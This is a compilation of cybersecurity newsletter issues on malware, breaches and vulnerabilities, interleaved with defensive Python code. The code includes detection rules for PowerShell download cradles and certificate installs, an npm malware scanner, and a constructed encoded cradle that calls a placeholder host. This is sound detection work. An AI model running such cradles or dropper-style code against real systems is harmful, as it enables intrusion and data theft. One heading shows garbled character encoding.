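        mean_entropy = sum(shannon_entropy(s.replace(".", "")) for s in g["subs"]) / len(g["subs"])
        # Both conditions together: a busy internal zone has many subdomains but
        # readable names; a tunnel has many subdomains that look like random data.
        if len(g["subs"]) >= min_unique and mean_entropy >= min_entropy:
            findings.append({
                "client": client,
                "domain": domain,
                "unique_subdomains": len(g["subs"]),
                "queries": g["queries"],
                "txt_ratio": g["txt"] / g["queries"],
                "mean_entropy": round(mean_entropy, 2),
            })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG.splitlines()):
        print(finding)
```

In the sample the corporate zone (nine readable hostnames from 10.0.0.9) stays quiet and only the host querying random-looking labels is reported, which is the point of combining the count with the entropy rather than alerting on either alone. Thresholds need tuning per environment: CDNs and some security products legitimately produce long, high-entropy names.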

RBIโ€™m listening ๐Ÿ™ƒ๐Ÿ™ƒ๐Ÿ™ƒ

๐Ÿšจ Evolution of Browser Security: From Isolation to Secure Extensions ๐Ÿ›ก๏ธ

The latest report, "The Next Generation of RBI (Remote Browser Isolation)," highlights the shift from Browser Isolation, once the gold standard for web security, to advanced Secure Browser Extensions. In today's SaaS-centric world, traditional Browser Isolation methods are no longer sufficient.

📉 Limitations of Browser Isolation

Browser Isolation faced challenges like:

Performance Issues: High CPU usage led to slower browsing, impacting productivity.

Inadequate Protection: Ineffective against modern threats like phishing and malicious extensions.

🔒 Emergence of Secure Browser Extensions

Secure Browser Extensions address these issues, providing:

Real-Time Visibility: Continuous monitoring of browsing activities.

Risk Analysis: Identifying and validating malicious actions.

Granular Enforcement: Automatically disabling harmful web components or blocking access.

⚙️ Advanced Features

Seamless Integration: Fits into existing browsers without impacting user experience.

Machine Learning: Analyses web pages in real-time to neutralise threats such as file downloads and credential harvesting.

🚀 Key Advantages Over Browser Isolation

Performance: Minimal CPU impact ensures smooth browsing.

Easy Deployment: Centralised deployment on managed devices and simple installation on unmanaged ones, ideal for all workplace types.

To dive deeper, check out the full report on the evolution of browser security and the benefits of Secure Browser Extensions.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!


Operation Endgame looking for Emotet Mastermind


Welcome to Gone Phishing, your daily cybersecurity newsletter that's cybercrime-a-phobic 🙃🙃🙃

Today's hottest cybersecurity news stories:

  • 👨‍💻 Emotet's got authorities running scared #shook 😰

  • 🛑 Flaws in Cox modems could impact millions

  • 😲 Gulp! RAT-Droppings found in npm package 📦

You better Emotet yourself before you wreck yourself 🔫🔪🩸😈🤵💵⛓️💀


🚨 Operation Endgame Seeks Info on Emotet Mastermind "Odd" 🧠

Law enforcement authorities involved in Operation Endgame are seeking information about an individual known as "Odd," who is allegedly the mastermind behind the infamous Emotet malware.

Who is "Odd"? 🎰

Aliases: Aron, C700, Cbd748, Ivanov Odd, Mors, Morse, Veron

Authorities believe Odd may not be working alone and could be collaborating with others on different malware projects.

Background on Emotet 🌆

Aliases in the Cybersecurity Community: Gold Crestwood, Mealybug, Mummy Spider, TA542

Evolution: Originally a banking trojan, Emotet evolved into a multipurpose tool capable of delivering other malware such as TrickBot, IcedID, and QakBot.

Recent Activity: An updated version of Emotet was found in March 2023 using Microsoft OneNote email attachments to bypass security. No new activity has been seen since April 2023.

Operation Endgame's Efforts 🔚

Recent Actions: The operation has resulted in four arrests and the takedown of over 100 servers linked to malware operations like IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot.

Target: The aim is to disrupt the Initial Access Broker (IAB) ecosystem that facilitates ransomware attacks.

Germany's Federal Criminal Police Office (BKA)

Revelation: Identified eight cybercriminals involved in SmokeLoader and TrickBot operations, adding them to the E.U. Most Wanted List.

Impact on Cybercrime 👨‍💻

Affected Groups: The crackdown has impacted Russian cybercrime organisations like BlackBasta, REvil, and Conti, which have used these malware services to attack Western companies, including medical institutions.

Community Reaction 🤯

Underground Forums: Cybercriminals on forums like XSS.IS are on high alert. The forum moderator "bratva" advised members to check their virtual private servers (VPSes) for disruptions between May 27 and 29, 2024.

Speculation: Users are speculating about the possibility of an insider ("rat") working with law enforcement, especially in light of leaked Conti ransomware logs.

What to Watch For

Potential Threats: Be aware of compromised accounts and malicious emails that use stolen credentials from RATs and info stealers to gain initial access to networks.

Takeaway

Stay Vigilant: As authorities continue their efforts to dismantle cybercriminal networks, it's crucial to remain vigilant against potential cyber threats. 🔒

Major Cox up 🙈🙈🙈

🚨 Cox Modem Vulnerabilities Patched to Prevent Unauthorised Access 🛠️

Recently patched authorization bypass issues in Cox modems could have been exploited to gain unauthorised access and execute malicious commands on these devices.

Key Points 🔑

Research Findings: Security researcher Sam Curry discovered vulnerabilities that allowed external attackers to execute commands, modify modem settings, and access personal information of business customers.

Potential Impact: Attackers could gain permissions equivalent to an ISP support team, affecting millions of modems.

Disclosure and Response: The vulnerabilities were responsibly disclosed to Cox on March 4, 2024, and were addressed within 24 hours. There is no evidence of exploitation in the wild.

Behind the Scenes 🎬

ISP Access: ISPs like Cox have extensive access to customer devices for remote management, including changing settings and viewing connected devices.

Internal Infrastructure: ISPs use internal infrastructures, such as Xfinity, that bridge consumer devices to exposed APIs. Vulnerabilities in these systems could compromise millions of devices.

Research Details 🔬

API Endpoints: Curry's analysis found about 700 exposed API endpoints. Some could be exploited to gain administrative access and execute unauthorised commands by replaying HTTP requests.

Example Exploit: The "profilesearch" endpoint could search for a customer's business account details using their name, retrieve hardware MAC addresses, and modify accounts.

Potential Attack Scenario ⚔️

Hypothetical Attack: An attacker could:

  • Look up a Cox customer and get complete account details.

  • Query the hardware MAC address to retrieve Wi-Fi passwords and connected devices.

  • Execute arbitrary commands to take over accounts.

Underlying Issues 👇

Complex Management: Managing a wide range of customer devices via a REST API is complex. This complexity likely contributed to the security flaws.

Authorization Mechanism: The issues arose from relying on a single internal protocol for access, highlighting the need for better authorization mechanisms.
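The "single internal protocol" problem described above, shown as an added example that is not Cox's code or Sam Curry's research code: a lookup handler that accepts a client-supplied header as proof of support-staff rights, beside one that verifies a server-issued, short-lived signed token and also checks that the caller is scoped to the particular account being queried. The endpoint, header names, signing key and account records are constructed.

```python
"""Header-trust versus token-scoped authorisation for a device-management API.

Added example; this is not Cox's code or Sam Curry's research code. The
endpoint, the header names, the signing key and the account records are
constructed for illustration.
"""
import base64
import hashlib
import hmac
import json
import time

SIGNING_KEY = b"constructed-demo-key-do-not-reuse"

# Constructed account records of the kind a support lookup would return.
ACCOUNTS = {
    "acct-1001": {"name": "Example Bakery", "modem_mac": "00:11:22:33:44:55"},
    "acct-2002": {"name": "Example Dentist", "modem_mac": "66:77:88:99:AA:BB"},
}


def profilesearch_weak(request):
    """BEFORE: the handler treats a request header as proof that the caller is
    support staff. Any client can set that header and a captured request can
    be replayed unchanged, so the check adds nothing."""
    if request["headers"].get("X-Internal-Role") != "support":
        return 403, {"error": "forbidden"}
    return 200, ACCOUNTS.get(request["params"].get("account"), {})


def issue_token(subject, role, accounts, ttl=300, now=None):
    """Server side: mint a short-lived HMAC-signed token naming the caller,
    their role and the accounts they may act on."""
    now = time.time() if now is None else now
    payload = {"sub": subject, "role": role, "accounts": sorted(accounts),
               "exp": int(now) + ttl}
    body = base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode()).decode()
    sig = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def verify_token(token, now=None):
    """Return the claims if the signature is valid and the token is unexpired."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    try:
        claims = json.loads(base64.urlsafe_b64decode(body))
    except ValueError:  # covers bad base64 and bad JSON
        return None
    if claims.get("exp", 0) < now:
        return None
    return claims


def profilesearch_hardened(request, now=None):
    """AFTER: identity comes from a server-verified token, and the handler also
    checks that this caller may see this particular account (object-level
    authorisation), not merely that they hold some role."""
    auth = request["headers"].get("Authorization", "")
    if not auth.startswith("Bearer "):
        return 401, {"error": "missing bearer token"}
    claims = verify_token(auth[len("Bearer "):], now=now)
    if claims is None:
        return 401, {"error": "invalid or expired token"}
    account = request["params"].get("account")
    if claims.get("role") != "support" or account not in claims.get("accounts", []):
        return 403, {"error": "not authorised for this account"}
    return 200, ACCOUNTS.get(account, {})
```

The short expiry bounds how long a captured request stays useful; binding the token to an explicit account list is what stops a valid support session from being turned into a lookup of every customer.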

Curry's Perspective

Insight: Curry was surprised by the level of access ISPs have to customer devices. He noted that better authorization mechanisms could prevent such vulnerabilities.

Past Research

Curry's team previously disclosed vulnerabilities in vehicles and points.com that could unlock, start, and track cars, and access and manage customer rewards points.

Conclusion 🏁

The patching of these vulnerabilities highlights the importance of secure management practices for customer devices by ISPs. It underscores the need for robust authorization mechanisms to prevent unauthorised access and potential misuse.

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with Presspool.ai! 🚀 Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." 🤓💡 That's us, alright! 🤵 How about you? Visionary AI executive, much? 👀

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business 🤖👩‍💻

Rest assured, the process is very straightforward.

You simply:

🆕 Sign Up & Create Campaign

📊 Define your audience, budget, and message to captivate your audience.

🚀 Launch your campaign, as Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

🕵️ Finally, you leverage real-time analytics to track performance and refine future strategies. 📈 Elevate your marketing game and stay informed with Presspool.ai! 🌟 Simples! 🦦

Presspool.ai 📰🏊🤖 may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a gamechanger. And we know newsletters 😉

Smells like RAT-Droppings 🐀🐀🐀

🚨 New Suspicious Package on npm Drops Remote Access Trojan 🎁

Cybersecurity researchers have discovered a new malicious package uploaded to the npm package registry, designed to deploy a remote access trojan (RAT) on compromised systems. Here's a breakdown of what was found:

Package Details 📦

Name: glup-debugger-log

Target: Users of the gulp toolkit, disguised as a "logger for gulp and gulp plugins."

Downloads: 175 times to date.

Malware Analysis 👾

Discovery: Software supply chain security firm Phylum identified the package.

Obfuscated Files: The package contains two obfuscated files working together to deploy the RAT.

Initial Dropper: Sets the stage for the malware campaign by compromising the target machine if it meets specific criteria, then downloads additional malware components.

Remote Access Mechanism: Provides persistent control over the compromised machine.

Technical Breakdown ⚙️

Manifest File: The library's package.json file contains a test script running a JavaScript file ("index.js") which, in turn, calls an obfuscated JavaScript file ("play.js").

Checks and Persistence: The "play.js" file functions as a dropper that:

  • Performs checks for network interfaces, specific Windows OS types (Windows NT), and the number of files in the Desktop folder (seven or more).

  • Ensures the target is an active developer machine, avoiding deployment on VMs or new installations.

  • If criteria are met, launches another JavaScript file ("play-safe.js") to set up persistence.

Persistence and Command Execution ⚡

HTTP Server Setup: "play-safe.js" establishes an HTTP server listening on port 3004 for incoming commands.

Command Execution: Executes commands and sends the output back to the client as plaintext.
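Every indicator in the breakdown above (a test script that launches a bundled file, a package name one typo away from gulp, hex-escaped strings and _0x identifiers, network-interface and Desktop probes, a listening HTTP server) is visible statically, before anything is installed. The triage script below is an added example, not Phylum's tooling, and contains no code from the package itself; the package contents it scans are constructed to carry those indicators and are never executed, only pattern-matched.

```python
"""Static triage of an npm package's contents for dropper-style indicators.

Added example; this is not Phylum's tooling and contains no code from the
package described in the report. The package contents below are constructed
to carry the indicators the report lists; the JavaScript is never executed.
"""
import json
import re

SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "glup-debugger-log",
        "version": "1.0.0",
        "description": "logger for gulp and gulp plugins",
        "scripts": {"test": "node index.js"},
    }),
    "index.js": 'require("./play.js");\n',
    # Constructed fragment: module declarations, a hex-escaped "Desktop" literal,
    # hex identifiers, a network-interface probe and a listening server.
    "play.js": (
        'const os=require("os"),fs=require("fs"),cp=require("child_process"),'
        'http=require("http");var _0x3f2a=["\\x44\\x65\\x73\\x6b\\x74\\x6f\\x70"];'
        'function _0x1b7c(){return os.networkInterfaces();}'
        'http.createServer(_0x9c).listen(3004);'
    ),
}

# A benign package for comparison (also constructed).
BENIGN_PACKAGE = {
    "package.json": json.dumps({"name": "gulp-plain-logger", "version": "0.1.0",
                                "scripts": {"test": "mocha"}}),
    "index.js": "module.exports = function log(msg) { console.log(msg); };\n",
}

POPULAR_NAMES = ["gulp", "lodash", "express", "react"]
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
INDICATORS = {
    "child_process": r"require\(\s*[\"']child_process[\"']\s*\)",
    "listening_server": r"\b(?:http|net)\.createServer\b|\.listen\(\s*\d+",
    "network_interface_probe": r"os\.networkInterfaces\(",
    "desktop_probe": r"\bDesktop\b",
    "hex_identifiers": r"_0x[0-9a-f]{3,}",
    "dynamic_eval": r"\beval\(|new\s+Function\(",
}


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot names a typo or two away from a popular package."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def unescape_hex(src: str) -> str:
    """Fold \\xNN escapes so string hiding does not defeat the keyword checks."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), src)


def scan_package(files: dict) -> dict:
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    name = manifest.get("name", "")
    # 1. Scripts: lifecycle hooks run on install; a test script that runs a
    #    package file with node is how the reported package starts its dropper.
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(f"lifecycle script '{hook}' runs: {cmd}")
        if re.search(r"\bnode\s+\S+\.js\b", cmd):
            findings.append(f"script '{hook}' executes a bundled JS file: {cmd}")
    # 2. Typosquatting: compare the leading name segment with popular packages.
    head = name.split("-")[0]
    for popular in POPULAR_NAMES:
        if head != popular and len(head) >= 4 and levenshtein(head, popular) <= 2:
            findings.append(f"name '{name}' is within 2 edits of '{popular}'")
    # 3. Source indicators, checked after de-escaping hex string literals.
    for fname, src in files.items():
        if not fname.endswith(".js"):
            continue
        plain = unescape_hex(src)
        for label, pattern in INDICATORS.items():
            if re.search(pattern, plain):
                findings.append(f"{fname}: {label}")
    score = len(findings)
    verdict = "suspicious" if score >= 4 else ("review" if score else "clean")
    return {"name": name, "score": score, "verdict": verdict, "findings": findings}


if __name__ == "__main__":
    for pkg in (SAMPLE_PACKAGE, BENIGN_PACKAGE):
        print(json.dumps(scan_package(pkg), indent=2))
```

Run it over the extracted contents of a tarball from the registry (npm pack downloads without installing) before the package reaches a developer machine; the de-escaping step is the part that matters most, since the obfuscation the report describes is aimed precisely at plain keyword greps.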

Phylum's Insights 💡

Nature of the RAT: Described as both crude and sophisticated due to its minimal functionality, self-contained nature, and heavy reliance on obfuscation.

Evolving Threats: Highlights the growing complexity and cleverness of malware in open-source ecosystems, with attackers developing compact, efficient, and stealthy malware designed to evade detection while maintaining powerful capabilities.

This discovery underscores the importance of vigilant monitoring and security practices in the software supply chain to protect against evolving threats.


ShinyHunters demands a $500,000 for Ticketmaster hack


Welcome to Gone Phishing, your daily cybersecurity newsletter that's blasting off like #Starlink 🚀🚀🚀

Today's hottest cybersecurity news stories:

  • 🎫 Ticketmaster hacked again! 560m affected. $500k demanded 💰

  • 🤗 Hugging Face detects unauthorised access to Spaces platform 🚉

  • ⚠️ Beware of fake browser update delivering BitRAT, Lumma Stealer 🐀

Ticketmaster? Hackers nick it faster 🙃🙃🙃

🚨 Ticketmaster Hack Exposes 560 Million Customers' Data! 🗃️

Live Nation, Ticketmaster's owner, confirmed "unauthorised activity" on its database after hackers claimed to have stolen personal details of 560 million customers. The hacking group ShinyHunters demands a $500,000 ransom to prevent selling the data. 💰

What Was Stolen?

The stolen data includes:

  • Names

  • Addresses

  • Phone numbers

  • Partial credit card details 💳

Investigation Underway

Live Nation revealed in a filing to the SEC that a criminal threat actor offered the data for sale on the dark web on May 27. The exact number of affected customers remains unconfirmed.

Global Impact 🌎

The Australian government and the FBI are involved in addressing the breach. Live Nation is working to mitigate risks and notify users about the unauthorised access.

Linked Hacks 🔗

This breach may be connected to a larger hacking campaign. Santander recently confirmed a related data breach affecting 30 million customers. Data samples have been posted on BreachForums, a dark web hacking forum. 💻

ShinyHunters' History 📜

ShinyHunters has a notorious past, including a breach of 70 million AT&T customers in 2021 and 200,000 Pizza Hut customers in Australia last year. Despite the FBI's crackdown in March 2023, the group remains active. 🚨

Past Security Issues 📅

Ticketmaster has faced security issues before, including a $10 million fine in 2020 for hacking a competitor and a cyber attack in November affecting Taylor Swift's Eras tour ticket sales. 🎟️

Top Tips 🛡️

If you're worried you may be affected:

  • Be alert for suspicious emails, messages, and calls.

  • Avoid sharing information with scammers exploiting the breach.

  • Watch out for messages about password resets, compensation, or missed deliveries.

  • Monitor your financial accounts for suspicious activity.

  • Change your Ticketmaster password and any other sites using the same password.

Stay safe and vigilant as this situation unfolds!

Learn how to scale your GRC program with automation and AI

Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.

  • Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring

  • Centralize risk and report on program impact to internal teams

  • Create your own Trust Center to proactively manage buyer needs

  • Leverage AI to answer security questionnaires faster

Join Vanta's webinar on June 11 to learn more about scaling your GRC program with automation and AI.

Register to save your spot.

Hugging egg on Face? 👀🍳🙈

🚨 Hugging Face Security Breach Exposes AI Platform! 🤖

AI company Hugging Face revealed unauthorised access to its Spaces platform. Suspicions arise that a subset of Spaces' secrets may have been accessed without authorisation.

What is Spaces?

Spaces allows users to create, host, and share AI and machine learning applications. It also serves as a discovery service for AI apps made by others on the platform. 🧠

Immediate Response 🗣️

Hugging Face is revoking compromised HF tokens and notifying affected users via email. They recommend refreshing keys or tokens and switching to fine-grained access tokens, which are now the default.

Impact and Investigation 💥

The number of impacted users remains undisclosed. The incident is under investigation, and law enforcement and data protection authorities have been alerted. 🚨

AI Sector Under Attack 🎯

The rapid growth of AI has made AI-as-a-service providers like Hugging Face prime targets for attackers. In early April, cloud security firm Wiz highlighted potential vulnerabilities in Hugging Face, including cross-tenant access and AI/ML model poisoning risks. 🔒

Previous Security Concerns ⚠️

Research by HiddenLayer identified flaws in Hugging Face's Safetensors conversion service, enabling hijacking of AI models for supply chain attacks. Malicious actors compromising Hugging Face could access private AI models, datasets, and critical applications, posing significant risks. ⚠️

Stay Secure 🛡️

Hugging Face users should update their tokens and stay vigilant against potential security threats. This breach underscores the importance of robust security measures in the growing AI sector.

Don't get Bit by a RAT 🐀🐀🐀

🚨 Fake Browser Updates Delivering RATs and Info Stealers! 🐀

Cybersecurity firm eSentire has identified a new wave of cyberattacks using fake browser updates to distribute remote access trojans (RATs) and information-stealing malware such as BitRAT and Lumma Stealer (aka LummaC2).

The Attack Chain 🔗

  • Initial Contact: Victims are lured to a compromised website with JavaScript that redirects them to a fake browser update page ("chatgpt-app[.]cloud").

  • Download: The page prompts an automatic download of a ZIP archive file ("Update.zip") hosted on Discord.

  • Execution: Inside the ZIP file, a JavaScript file ("Update.js") executes PowerShell scripts to fetch additional payloads disguised as PNG images from a remote server.

PowerShell Payloads 🐚

The PowerShell scripts not only ensure persistence but also deploy a .NET-based loader used to deliver final-stage malware, including BitRAT and Lumma Stealer.

BitRAT: A versatile RAT capable of data theft, cryptocurrency mining, and remote control.

Lumma Stealer: A commercial information stealer that extracts data from web browsers, crypto wallets, and more, available for $250 to $1,000 per month since August 2022.

Why This Tactic Works ♟️

The fake browser update lure is effective because it leverages the trust associated with well-known software updates, maximising the reach and impact of the attack. This method has been commonly used to distribute various types of malware, including the notorious SocGholish malware. 🕵️‍♂️

Broader Threat Landscape 🏞️

ClearFake Campaign: A new variant discovered by ReliaQuest involves tricking users into executing malicious PowerShell code by claiming a browser display issue and instructing them to install a root certificate.

Webhard Distribution: The AhnLab Security Intelligence Center (ASEC) reported campaigns using webhards to distribute malicious installers for adult games and cracked software, leading to malware like Orcus RAT and XMRig miner.
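Both the PowerShell stage above (persistence plus a loader that fetches payloads disguised as PNG images) and the ClearFake variant (a user pasting PowerShell that installs a root certificate) leave traces in PowerShell script-block logging (Windows Event ID 4104). The triage below is an added example, not eSentire's or ReliaQuest's detection content; the event records, host names and URLs are constructed, and the encoded launch is built in place so the decode-and-rescan step can be shown.

```python
"""Triage of PowerShell script-block log entries (Event ID 4104) for the
behaviours described above: hidden/bypass/encoded launches, download cradles
fetching "image" URLs, root-certificate installs and scheduled-task persistence.

Added example; this is not eSentire's or ReliaQuest's detection content. The
events, hosts and URLs are constructed; the encoded payload is built in place.
"""
import base64
import re

RULES = {
    "hidden_window": r"(?i)-w(?:indowstyle)?\s+hidden",
    "execution_policy_bypass": r"(?i)-e(?:xecutionpolicy|p)\s+bypass",
    "download_cradle": r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod",
    "image_url_fetch": r"(?i)https?://[^\s'\"]+\.(?:png|jpg|gif)\b",
    "root_cert_install": r"(?i)Import-Certificate|certutil(?:\.exe)?\s+-addstore|X509Store\(",
    "scheduled_task_persistence": r"(?i)Register-ScheduledTask|schtasks(?:\.exe)?\s+/create",
}
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Constructed payload and events. -EncodedCommand takes base64 of UTF-16LE text,
# so the first event is built exactly that way.
ENCODED_PAYLOAD = "(New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/i/1.png')"
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS-01", "user": "alice",
     "script": "powershell.exe -w hidden -ep bypass -enc "
               + base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode()},
    {"id": 4104, "host": "WS-02", "user": "bob",
     "script": 'Import-Certificate -FilePath "$env:TEMP\\fix.cer" -CertStoreLocation Cert:\\LocalMachine\\Root'},
    {"id": 4104, "host": "WS-03", "user": "carol",
     "script": "Get-ChildItem C:\\Users\\carol\\Documents | Measure-Object"},
    {"id": 4104, "host": "WS-01", "user": "alice",
     "script": "Register-ScheduledTask -TaskName 'BrowserUpdate' -Action $a -Trigger $t"},
]


def decode_encoded_command(script: str):
    """Return the decoded -EncodedCommand text, or None if there is none."""
    m = ENCODED_ARG.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_rules(text: str):
    return [name for name, pattern in RULES.items() if re.search(pattern, text)]


def triage_event(event: dict) -> dict:
    """Score one script-block event; encoded commands are decoded and re-scanned."""
    script = event["script"]
    indicators = set(match_rules(script))
    decoded = decode_encoded_command(script)
    if decoded is not None:
        indicators.add("encoded_command")
        indicators.update(match_rules(decoded))
    if "root_cert_install" in indicators or len(indicators) >= 2:
        severity = "high"
    elif indicators:
        severity = "medium"
    else:
        severity = "low"
    return {"host": event["host"], "user": event["user"], "severity": severity,
            "indicators": sorted(indicators), "decoded": decoded}


def triage_events(events=SAMPLE_EVENTS):
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for r in triage_events():
        print(r)
```

Script-block logging has to be enabled by policy before any of this is available, and the root-certificate rule is deliberately weighted as high on its own: a certificate landing in the machine Root store from an interactive PowerShell session is rare enough in most fleets to be worth a ticket every time.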

Impact and Prevalence 💥

Lumma Stealer has become one of the most prevalent info stealers, with a significant increase in logs for sale on cybercrime forums. The malware's effectiveness lies in its ability to infiltrate systems and exfiltrate data undetected.

Additional Findings 🧐

CryptoChameleon: Silent Push highlighted CryptoChameleon's use of DNSPod[.]com nameservers for fast flux evasion techniques, allowing quick cycling of IPs linked to a single domain name, complicating traditional countermeasures.

Top Tips 🛡️

  • Be Wary of Fake Updates: Always verify the source of any software update prompt.

  • Monitor PowerShell Activity: Keep an eye on unexpected PowerShell executions.

  • Use Security Software: Employ robust antivirus and anti-malware tools.

  • Stay Informed: Keep up with cybersecurity news and updates to be aware of emerging threats.

By staying vigilant and informed, individuals and organisations can better protect themselves against these sophisticated and evolving cyber threats.
